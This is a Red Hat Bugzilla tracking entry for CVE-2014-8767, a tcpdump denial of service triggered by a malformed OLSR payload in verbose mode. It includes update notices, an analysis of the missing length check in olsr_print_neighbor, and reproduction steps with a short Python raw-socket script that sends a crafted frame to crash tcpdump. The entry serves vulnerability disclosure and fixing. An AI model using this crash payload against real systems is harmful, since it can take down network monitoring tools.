Bug 1165160 (CVE-2014-8767)
| Summary: | CVE-2014-8767 tcpdump: denial of service in verbose mode using malformed OLSR payload | ||||||
|---|---|---|---|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Vasyl Kaigorodov <vkaigoro> | ||||
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> | ||||
| Status: | CLOSED WONTFIX | QA Contact: | |||||
| Severity: | low | Docs Contact: | |||||
| Priority: | low | ||||||
| Version: | unspecified | CC: | athmanem, carnil, msekleta, sardella, sisharma | ||||
| Target Milestone: | --- | Keywords: | Security | ||||
| Target Release: | --- | ||||||
| Hardware: | All | ||||||
| OS: | Linux | ||||||
| Whiteboard: | |||||||
| Fixed In Version: | tcpdump 4.7.0 | Doc Type: | Bug Fix | ||||
| Doc Text: | Story Points: | --- | |||||
| Clone Of: | Environment: | ||||||
| Last Closed: | 2021-06-14 15:04:01 UTC | Type: | --- | ||||
| Regression: | --- | Mount Type: | --- | ||||
| Documentation: | --- | CRM: | |||||
| Verified Versions: | Category: | --- | |||||
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |||||
| Cloudforms Team: | --- | Target Upstream Version: | |||||
| Embargoed: | |||||||
| Bug Depends On: | 1165165 | ||||||
| Bug Blocks: | 1165164 | ||||||
| Attachments: |
|
||||||
Created tcpdump tracking bugs for this issue: Affects: fedora-all [bug 1165165] Created attachment 961282 [details]
Fix_uncheck_length_olsr_patch_ from_debian_bug
Thanks for the patch but the bug is already fixed. I added this bug number to bugs= field when I created update but bodhi is updating only the tracking bug instead of this one. Same applies to other currently opened CVE bugs for tcpdump. Analysis
========
In function olsr_print_neighbor (const u_char *msg_data, u_int hello_len)
No length check is done for hello_len variable prior to printing msg_data
as while loop is used which iterates according to the size of hello_len,
having really large value of hello_len can cause crash
while (hello_len >= sizeof(struct in_addr)) {
/* print 4 neighbors per line */
printf("%s%s", ipaddr_string(msg_data),
neighbor % 4 == 0 ? "\n\t\t" : " ");
msg_data += sizeof(struct in_addr);
hello_len -= sizeof(struct in_addr);
}
tcpdump-4.5.1-2.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report. Yes it is. Affected versions are 3.9.6 through 4.6.2 tcpdump-4.4.0-4.fc19 has been pushed to the Fedora 19 stable repository. If problems still persist, please make note of it in this bug report. tcpdump-4.6.2-2.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report. Statement: Red Hat Product Security has rated this issue as having low security impact, a future update may address this flaw in tcpdump. This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2014-8767 |
Tcpdump program crash was reported [1] when processing a malformed OLSR payload. Tcpdump should be run with verbose output flag set to trigger this issue. To reproduce start tcpdump on a network interface sudo tcpdump -i lo -s 0 -n -v (running the program with sudo might hide the segfault message on certain environments, see dmesg for details) and use the following python program to generate a frame on the network (might also need sudo): #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00" s.send(olsr_frame) Affected versions are 3.9.6 through 4.6.2 [1]: http://seclists.org/bugtraq/2014/Nov/90